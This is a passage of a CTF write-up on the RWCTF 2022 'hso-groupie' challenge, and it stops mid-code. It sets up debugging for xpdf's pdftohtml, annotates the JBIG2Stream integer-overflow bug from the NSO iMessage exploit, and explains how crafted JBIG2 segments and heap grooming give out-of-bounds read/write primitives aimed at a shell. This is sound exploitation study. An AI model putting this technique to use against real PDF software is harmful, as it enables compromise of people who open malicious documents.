text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker exec -it 15f265c337c0 bash</span><br></pre></td></tr></table></figure><p>Enter the container's bash environment, then start gdbserver:</p><figure class="highlight 
text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm -rf output &amp;&amp; /usr/bin/gdbserver :1234 /usr/local/bin/pdftohtml /tmp/chall/exploit/sploit.pdf output</span><br></pre></td></tr></table></figure><p>Here output can be any directory name. It is a required argument of pdftohtml, which creates the directory and writes its result there; the directory must not already exist (hence the <code>rm -rf output</code>). sploit.pdf is the exp pdf generated above.</p><p>Then start gdb on the host as well, run <code>target remote :1234</code>, and set a breakpoint somewhere to check that it works. Because the source path inside docker differs from the one on my host, <code>substitute-path</code> is needed to map between them. It is worth putting these commands in a gdb script so they do not have to be retyped every time.</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span 
class="line">43</span><br></pre></td><td class="code"><pre><span class="line">target remote :1234</span><br><span class="line">set substitute-path  /tmp/xpdf-4.03/xpdf /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf</span><br><span class="line">b findSegment</span><br><span class="line">c</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line"> ► 0x555555675179    mov    r8, qword ptr [rax]</span><br><span class="line">   0x55555567517c    cmp    dword ptr [r8 + 8], esi</span><br><span class="line">   0x555555675180    jne    0x555555675170                &lt;0x555555675170&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x555555675170    add    rax, 8</span><br><span class="line">   0x555555675174    cmp    rax, rdx</span><br><span class="line">   0x555555675177    je     0x555555675190                &lt;0x555555675190&gt;</span><br><span class="line">───────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────</span><br><span class="line">In file: /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf/JBIG2Stream.cc</span><br><span class="line">   4036 JBIG2Segment *JBIG2Stream::findSegment(Guint segNum) &#123;</span><br><span class="line">   4037   JBIG2Segment *seg;</span><br><span class="line">   4038   int i;</span><br><span class="line">   4039 </span><br><span class="line">   4040   for (i = 0; i &lt; globalSegments-&gt;getLength(); ++i) &#123;</span><br><span class="line"> ► 4041     seg = (JBIG2Segment *)globalSegments-&gt;get(i);</span><br><span class="line">   4042     if (seg-&gt;getSegNum() == segNum) &#123;</span><br><span class="line">   4043       return seg;</span><br><span class="line">   4044     &#125;</span><br><span class="line">   4045   &#125;</span><br><span class="line">   4046   for (i = 0; i &lt; segments-&gt;getLength(); ++i) &#123;</span><br><span class="line">───────────────────────────────────────────[ STACK 
]────────────────────────────────────────────</span><br><span class="line">00:0000│ rsp 0x7fffffffdd28 —▸ 0x555555676c72 ◂— mov    r12, rax</span><br><span class="line">01:0008│     0x7fffffffdd30 ◂— 0x0</span><br><span class="line">02:0010│     0x7fffffffdd38 ◂— 0x0</span><br><span class="line">03:0018│     0x7fffffffdd40 —▸ 0x555561ec0f00 ◂— 0x200000001</span><br><span class="line">04:0020│     0x7fffffffdd48 —▸ 0x555561f40c64 ◂— 0x203a100000000</span><br><span class="line">05:0028│     0x7fffffffdd50 ◂— 0x0</span><br><span class="line">... ↓        2 skipped</span><br><span class="line">─────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────</span><br><span class="line"> ► f 0   0x555555675179</span><br><span class="line">   f 1   0x555555676c72</span><br><span class="line">   f 2   0x555555679198 JBIG2Stream::readSegments()+1032</span><br><span class="line">   f 3   0x555555679473 JBIG2Stream::reset()+211</span><br><span class="line">   f 4   0x55555560139a</span><br><span class="line">   f 5   0x5555556494a9</span><br><span class="line">   f 6   0x55555564aba0</span><br><span class="line">   f 7   0x55555563c9e5</span><br></pre></td></tr></table></figure><p>That completes the debugging environment setup.</p><h2 id="三、漏洞点">III. The Vulnerability</h2><p>The intended solution uses the vulnerability described in Google Project Zero's <a href="https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">iMessage exploit</a> write-up. The bug is in <code>JBIG2Stream</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readTextRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                    GBool lossless, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                    Guint *refSegs, Guint nRefSegs)</span> </span>&#123;</span><br><span class="line">  ...</span><br><span class="line">  Guint numSyms;</span><br><span class="line">  ...</span><br><span class="line">  <span class="comment">// get symbol dictionaries and tables</span></span><br><span class="line">  codeTables = <span class="keyword">new</span> <span class="built_in">GList</span>();</span><br><span class="line">  <span class="comment">// 1. 
initially 0</span></span><br><span class="line">  numSyms = <span class="number">0</span>;  </span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((seg = <span class="built_in">findSegment</span>(refSegs[i]))) &#123;</span><br><span class="line">      <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict) &#123;</span><br><span class="line">        <span class="comment">// 2. a user-controlled value is added to this variable, which can overflow the integer</span></span><br><span class="line">        numSyms += ((JBIG2SymbolDict *)seg)-&gt;<span class="built_in">getSize</span>();</span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegCodeTable) &#123;</span><br><span class="line">        codeTables-&gt;<span class="built_in">append</span>(seg);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      ...</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  ...</span><br><span class="line">  <span class="comment">// get the symbol bitmaps</span></span><br><span class="line">  <span class="comment">// 3. 
after the overflow, a small heap buffer (an array of pointers) is allocated here</span></span><br><span class="line">  syms = (JBIG2Bitmap **)<span class="built_in">gmallocn</span>(numSyms, <span class="built_in">sizeof</span>(JBIG2Bitmap *));</span><br><span class="line">  kk = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((seg = <span class="built_in">findSegment</span>(refSegs[i]))) &#123;</span><br><span class="line">      <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict) &#123;</span><br><span class="line">        symbolDict = (JBIG2SymbolDict *)seg;</span><br><span class="line">        <span class="comment">// 4. the pointers are written into that buffer, overflowing the heap</span></span><br><span class="line">        <span class="keyword">for</span> (k = <span class="number">0</span>; k &lt; symbolDict-&gt;<span class="built_in">getSize</span>(); ++k) &#123;</span><br><span class="line">          syms[kk++] = symbolDict-&gt;<span class="built_in">getBitmap</span>(k);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>In the maliciously crafted <code>refSegs</code>, some <code>seg-&gt;getSize()</code> values are very large (4GB), so writing all of the pointers would certainly crash. A real exploit therefore grooms the heap first (heap feng shui):</p><p><img src="/2022/02/rwctf2022_hso/1.jpg" alt="img"></p><p>As the figure shows, the exploit needs to place the <strong>backing store of the segments GList</strong> at a <strong>higher address</strong> than the <strong>newly allocated, undersized buffer</strong>. Then, when the overflow is triggered, the first few writes, which come from normally sized dictionaries, <strong>overwrite the segment pointer of the oversized dictionary in the backing store with a pointer to something that is not a JBIG2SymbolDict (namely a JBIG2Bitmap)</strong>. When the program later looks up that segment pointer, it skips it.</p><h2 id="四、漏洞利用前置知识">IV. Exploitation Prerequisites</h2><h3 id="1-JBIG2Decode">1. 
JBIG2Decode</h3><p>The bug is in JBIG2Stream, but how does a JBIG2Stream end up inside a pdf?</p><p>A pdf file is essentially a tree of objects. Here is a pdf fragment that uses a JBIG2Stream:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">4 0 obj</span><br><span class="line">&lt;&lt; /Filter /FlateDecode</span><br><span class="line">/Length 3988</span><br><span class="line">&gt;&gt;</span><br><span class="line">stream</span><br><span class="line">/* [MyStream1] */</span><br><span class="line">endstream</span><br><span class="line">endobj</span><br><span class="line"></span><br><span class="line">5 0 obj</span><br><span class="line">&lt;&lt; /DecodeParms  &lt;&lt; /JBIG2Globals 4 0 R &gt;&gt;</span><br><span class="line">/Width 1024</span><br><span class="line">/ColorSpace /DeviceGray</span><br><span class="line">/Height 1</span><br><span class="line">/Filter /JBIG2Decode</span><br><span class="line">/Subtype /Image</span><br><span class="line">/Length 418248</span><br><span class="line">/Type /XObject</span><br><span class="line">/BitsPerComponent 1</span><br><span class="line">&gt;&gt;</span><br><span class="line">stream</span><br><span class="line">/* [MyStream2] */</span><br><span 
class="line">endstream</span><br><span class="line">endobj</span><br></pre></td></tr></table></figure><blockquote><p>In a pdf file, <code>4 0 obj</code> and <code>5 0 obj</code> each denote a specific pdf object.</p></blockquote><p><code>4 0 obj</code> contains the stream <code>MyStream1</code>; its parameter <code>/Filter /FlateDecode</code> means the stream is compressed with zlib.</p><p>Further down, in <code>5 0 obj</code>, <code>/DecodeParms</code> references the stream in <code>4 0 obj</code>, i.e. <code>MyStream1</code>, and the parameter <code>/Filter /JBIG2Decode</code> specifies that the following stream <code>MyStream2</code> is decoded with <code>JBIG2Decode</code>.</p><p>So <code>MyStream2</code> is decoded with <strong>JBIG2Decode</strong>, and its decode parameter, stored under the key <code>JBIG2Globals</code>, is the referenced <code>4 0 obj</code>, i.e. <strong>the stream obtained by decoding</strong> <code>MyStream1</code> with <code>FlateDecode</code>.</p><p>Our job is to carefully craft <code>MyStream1</code> and <code>MyStream2</code> (both are JBIG2Streams) so that parsing them triggers the vulnerability and ultimately gets a shell.</p><p>Once both streams are built, <a href="https://github.com/agl/jbig2enc/blob/master/pdf.py">jbig2enc/pdf.py</a> can be used to produce the pdf.</p><h3 id="2-Segments-小叙">2. 
A Brief Look at Segments</h3><blockquote><p>Note: it is best to read the code for each segment in this section yourself.</p></blockquote><p>As the previous section showed, JBIG2Decode takes a <code>JBIG2Globals</code> parameter. When xpdf decodes a JBIG2Stream, it therefore parses the <code>JBIG2Globals</code> stream first and the main stream afterwards. The following code shows how the streams are parsed:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::reset</span><span class="params">()</span></span></span><br><span 
class="line"><span class="function"></span>&#123;</span><br><span class="line">    GList *t;</span><br><span class="line"></span><br><span class="line">    segments = <span class="keyword">new</span> <span class="built_in">GList</span>();</span><br><span class="line">    globalSegments = <span class="keyword">new</span> <span class="built_in">GList</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// read the globals stream</span></span><br><span class="line">    <span class="keyword">if</span> (globalsStream.<span class="built_in">isStream</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// parse the globals stream passed via DecodeParms, i.e. FlateDecode(MyStream1)</span></span><br><span class="line">        curStr = globalsStream.<span class="built_in">getStream</span>();</span><br><span class="line">        curStr-&gt;<span class="built_in">reset</span>();</span><br><span class="line">        <span class="comment">// parsing needs the decoders, so point them at this stream first</span></span><br><span class="line">        arithDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">        huffDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">        mmrDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">        <span class="comment">// start reading segments</span></span><br><span class="line">        <span class="built_in">readSegments</span>();</span><br><span class="line">        curStr-&gt;<span class="built_in">close</span>();</span><br><span class="line">        <span class="comment">// swap the newly read segments list into globalSegments</span></span><br><span class="line">        t = segments;</span><br><span class="line">        segments = globalSegments;</span><br><span class="line">        globalSegments = t;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span 
class="line">    <span class="comment">// read the main stream</span></span><br><span class="line">    <span class="comment">// parse the main stream, i.e. MyStream2</span></span><br><span class="line">    curStr = str;</span><br><span class="line">    curStr-&gt;<span class="built_in">reset</span>();</span><br><span class="line">    <span class="comment">// point the decoders at the main stream as well</span></span><br><span class="line">    arithDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">    huffDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">    mmrDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">    <span class="built_in">readSegments</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (pageBitmap)</span><br><span class="line">    &#123;</span><br><span class="line">        dataPtr = pageBitmap-&gt;<span class="built_in">getDataPtr</span>();</span><br><span class="line">        dataEnd = dataPtr + pageBitmap-&gt;<span class="built_in">getDataSize</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        dataPtr = dataEnd = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>From this we can see that <strong>a JBIG2Stream is made up of multiple Segments</strong>. There are many segment types; here we only look at the few that the exploit uses.</p><h4 id="a-EOFSeg">a. EOFSeg</h4><p>Parsing this segment marks the end of segment reading; it serves no other purpose.</p><h4 id="b-SymbolDictSeg">b. 
SymbolDictSeg</h4><p>A SymbolDict mainly holds <strong>an array of pointers to Bitmaps</strong>. A Bitmap can store arbitrary data, and in the actual exploit it plays a role similar to memory.</p><p>Each Bitmap in a symbol dict is called an <strong>instance</strong> in the specification.</p><p>When a SymbolDictSeg is parsed, every Bitmap is read from the stream and created.</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="function">GBool <span class="title">JBIG2Stream::readSymbolDictSeg</span><span class="params">(Guint segNum, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     Guint *refSegs, Guint nRefSegs)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// allocate the bitmaps array</span></span><br><span class="line">    <span class="comment">// get the input symbol bitmaps</span></span><br><span class="line">    bitmaps = (JBIG2Bitmap **)<span class="built_in">gmallocn</span>(numInputSyms + numNewSyms,</span><br><span class="line">                                       <span class="built_in">sizeof</span>(JBIG2Bitmap *));</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; numInputSyms + numNewSyms; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        bitmaps[i] = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    k = <span class="number">0</span>;</span><br><span class="line">    inputSymbolDict = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ((seg = <span class="built_in">findSegment</span>(refSegs[i])))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict)</span><br><span class="line">            &#123;</span><br><span class="line"> 
               inputSymbolDict = (JBIG2SymbolDict *)seg;</span><br><span class="line">                <span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; inputSymbolDict-&gt;<span class="built_in">getSize</span>(); ++j)</span><br><span class="line">                &#123;</span><br><span class="line">                    bitmaps[k++] = inputSymbolDict-&gt;<span class="built_in">getBitmap</span>(j);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// start reading the new bitmaps from the external JBIG2Stream data</span></span><br><span class="line">    symHeight = <span class="number">0</span>;</span><br><span class="line">    i = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> (i &lt; numNewSyms)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// read the height class delta height</span></span><br><span class="line">        <span class="keyword">if</span> (huff) [...]</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            arithDecoder-&gt;<span class="built_in">decodeInt</span>(&amp;dh, iadhStats);</span><br><span class="line">        &#125; </span><br><span class="line">        [...]</span><br><span class="line">        symHeight += dh;</span><br><span class="line">        symWidth = <span class="number">0</span>;</span><br><span class="line">        totalWidth = <span class="number">0</span>;</span><br><span class="line">        j = i;</span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="comment">// read the symbols in this height 
class</span></span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// read the delta width</span></span><br><span class="line">            <span class="keyword">if</span> (huff) [...]</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> (!arithDecoder-&gt;<span class="built_in">decodeInt</span>(&amp;dw, iadwStats))</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            [...]</span><br><span class="line"></span><br><span class="line">            <span class="comment">// using a collective bitmap, so don&#x27;t read a bitmap here</span></span><br><span class="line">            <span class="keyword">if</span> (huff &amp;&amp; !refAgg) [...]</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> (refAgg) [...]</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">// read a bitmap from the external stream and store it in the array</span></span><br><span class="line">                bitmaps[numInputSyms + i] =</span><br><span class="line">                    <span class="built_in">readGenericBitmap</span>(gFalse, symWidth, symHeight,</span><br><span class="line">                                    sdTemplate, gFalse, gFalse, <span class="literal">NULL</span>,</span><br><span class="line">                                    sdATX, sdATY, <span class="number">0</span>);</span><br><span class="line">            
&#125;</span><br><span class="line"></span><br><span class="line">            ++i;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// read the collective bitmap</span></span><br><span class="line">        <span class="keyword">if</span> (huff &amp;&amp; !refAgg) [...]</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// allocate the symbolDict that will hold the exported bitmaps</span></span><br><span class="line">    <span class="comment">// create the symbol dict object</span></span><br><span class="line">    symbolDict = <span class="keyword">new</span> <span class="built_in">JBIG2SymbolDict</span>(segNum, numExSyms);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// copy the bitmaps array built above into the symbolDict</span></span><br><span class="line">    <span class="comment">// exported symbol list</span></span><br><span class="line">    i = j = <span class="number">0</span>;</span><br><span class="line">    ex = gFalse;</span><br><span class="line">    prevRun = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">while</span> (i &lt; numInputSyms + numNewSyms)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (huff)</span><br><span class="line">            [...]</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            arithDecoder-&gt;<span class="built_in">decodeInt</span>(&amp;run, iaexStats);</span><br><span class="line">        &#125;</span><br><span class="line">        [...]</span><br><span class="line">        <span class="keyword">if</span> (ex)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">for</span> (cnt = <span class="number">0</span>; cnt &lt; run; ++cnt)</span><br><span class="line">  
          &#123;</span><br><span class="line">                <span class="comment">// deep-copy each bitmap built above into symbolDict</span></span><br><span class="line">                symbolDict-&gt;<span class="built_in">setBitmap</span>(j++, bitmaps[i++]-&gt;<span class="built_in">copy</span>());</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            i += run;</span><br><span class="line">        &#125;</span><br><span class="line">        ex = !ex;</span><br><span class="line">        prevRun = run;</span><br><span class="line">    &#125;</span><br><span class="line">    [...] <span class="comment">// free the bitmaps array</span></span><br><span class="line">    <span class="comment">// store the new symbol dict</span></span><br><span class="line">    segments-&gt;<span class="built_in">append</span>(symbolDict);</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="c-PageInfoSeg">c. 
PageInfoSeg</h4><p>Every page needs a Bitmap that represents its rendered data. When a PageInfoSeg is parsed, the program creates a stream-wide Bitmap: <strong>pageBitmap</strong>.</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readPageInfoSeg</span><span class="params">(Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    Guint xRes, yRes, flags, striping;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">readULong</span>(&amp;pageW) || !<span class="built_in">readULong</span>(&amp;pageH) ||</span><br><span class="line">        !<span class="built_in">readULong</span>(&amp;xRes) || !<span class="built_in">readULong</span>(&amp;yRes) ||</span><br><span class="line">        !<span class="built_in">readUByte</span>(&amp;flags) || !<span class="built_in">readUWord</span>(&amp;striping))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">goto</span> eofError;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// 
create the stream-wide pageBitmap field</span></span><br><span class="line">    pageBitmap = <span class="keyword">new</span> <span class="built_in">JBIG2Bitmap</span>(<span class="number">0</span>, pageW, curPageH);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// default pixel value</span></span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">eofError:</span><br><span class="line">    <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(), <span class="string">&quot;Unexpected EOF in JBIG2 stream&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note that <strong>pageBitmap is critical</strong>: it is the bitmap of a page. We will use a heap overflow to overwrite the width and height of pageBitmap and thereby obtain out-of-bounds reads and writes.</p><blockquote><p>PageInfoSeg can also be used to bypass a sanity check, as described later.</p></blockquote><h4 id="d-GenericRegionSeg">d. 
GenericRegionSeg</h4><p>Parsing a GenericRegionSeg <strong>reads a Bitmap from the stream</strong> and <strong>combines it with a specific region of the current pageBitmap</strong>:</p><blockquote><p>Note that segments in the JBIG2Globals stream are not allowed to reference any segment, so a GenericRegionSeg cannot be placed in the JBIG2Globals stream.</p></blockquote><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readGenericRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                       GBool lossless, Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// read the bitmap</span></span><br><span class="line">    bitmap = <span class="built_in">readGenericBitmap</span>(mmr, w, h, templ, tpgdOn, gFalse,</span><br><span class="line">                               <span class="literal">NULL</span>, atx, aty, mmr ? 
length - <span class="number">18</span> : <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// combine the region bitmap into the page bitmap</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (pageH == <span class="number">0xffffffff</span> &amp;&amp; y + h &gt; curPageH)</span><br><span class="line">        &#123;</span><br><span class="line">            pageBitmap-&gt;<span class="built_in">expand</span>(y + h, pageDefPixel);</span><br><span class="line">        &#125;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The Bitmap is read from the stream in <code>readGenericBitmap</code>, which relies on the <strong>decoders</strong>.</p><p>The combination with pageBitmap is done mainly by <code>JBIG2Bitmap::combine</code>, which supports five operations: <strong>OR, AND, XOR, XNOR, and REPLACE</strong>:</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="keyword">switch</span> (combOp)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0</span>: <span class="comment">// or</span></span><br><span class="line">        dest |= src1 &amp; m2;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">1</span>: <span class="comment">// and</span></span><br><span class="line">        dest &amp;= src1 | m1;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">2</span>: <span class="comment">// xor</span></span><br><span class="line">        dest ^= src1 &amp; m2;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">3</span>: <span class="comment">// xnor</span></span><br><span class="line">        dest ^= (src1 ^ <span class="number">0xff</span>) &amp; m2;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">4</span>: <span class="comment">// replace</span></span><br><span class="line">        dest = (src1 &amp; m2) | (dest &amp; m1);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>By exploiting how this segment is parsed, we can load <strong>immediate values from outside</strong> into pageBitmap, where they await further computation.</p></blockquote><h4 id="e-GenericRefinementRegionSeg">e. 
GenericRefinementRegionSeg</h4><p>Chaining several GenericRefinementRegionSeg parses lets us perform bitwise operations on parts of the data in pageBitmap. We can use these bitwise operations to build an adder:</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readGenericRefinementRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                                 GBool lossless, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                                   
